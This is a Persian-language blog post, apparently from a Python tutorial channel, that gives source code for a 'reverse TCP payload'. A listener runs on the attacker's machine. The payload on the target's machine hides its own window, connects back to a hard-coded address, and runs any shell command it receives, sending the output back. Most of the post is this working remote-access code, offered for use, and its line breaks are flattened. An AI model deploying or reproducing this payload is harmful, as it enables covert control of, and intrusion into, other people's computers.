-
شنبه, ۴ ارديبهشت ۱۴۰۰، ۰۹:۴۴ ب.ظ
-
۱۷۹۲
طراحی پیلود Reverse TCP در پایتون و کنترل سیستم هدف از طریق آن
درود به همه !
اگه یادتون باشه قبلا پستی به نام ( ساخت پیلود شخصی برای کنترل کامپیوتر شخصی در پایتون ) منتشر کرده بودیم که در این پست اومدیم یک پیلود بسیار ساده طراحی کردیم و با استفاده از اون میتونستیم دستورات دلخواهمون رو روی کامپیوتر هدفمون اجرا کنیم . ولی این پیلود مشکلات زیادی داشت و کاملا مبتدی بود . امروز تصمیم گرفتیم از صفر شروع کنیم و یک پیلود Reverse TCP خیلی قوی تر از پیلود قبلی بنویسیم با قابلیت هایی مثل مخفی کردن خودش از دید کاربر و ... و با استفاده از اون دستورات دلخواهمون رو روی سیستم هدفمون اجرا کنیم و کنترلش کنیم .
ویدیو آموزش :
سورس شنودگر (سیستم هکر):
# hackerimport socketsock = socket.socket(socket.AF_INET , socket.SOCK_STREAM)sock.bind(("192.168.1.103",12345))sock.listen()c, addr = sock.accept() c.settimeout(3) while True: command = input("target >> ") if command == "exit": c.send(b"exit") sock.close() break c.send(command.encode())try: result = c.recv(1024) print(result.decode()) except: pass
سورس payload (سیستم هدف):
# targetimport socket import subprocessfrom win32con import SW_HIDE import win32guidef hidden(): pid = win32gui.GetForegroundWindow() win32gui.ShowWindow(pid , SW_HIDE)hidden()sock = socket.socket(socket.AF_INET , socket.SOCK_STREAM)sock.connect(("192.168.1.103" , 12345))while True: command = sock.recv(1024) if command == b"exit": sock.close() break proc = subprocess.Popen(command.decode() , shell=True , stdout=subprocess.PIPE, stderr = subprocess.PIPE)result = proc.stdout.read() + proc.stderr.read()sock.send(result)
امیدوارم لذت ببرید .
سوالی بود مطرح کنید
یا حق !
Telegram Channel : @mrpythonblog
emi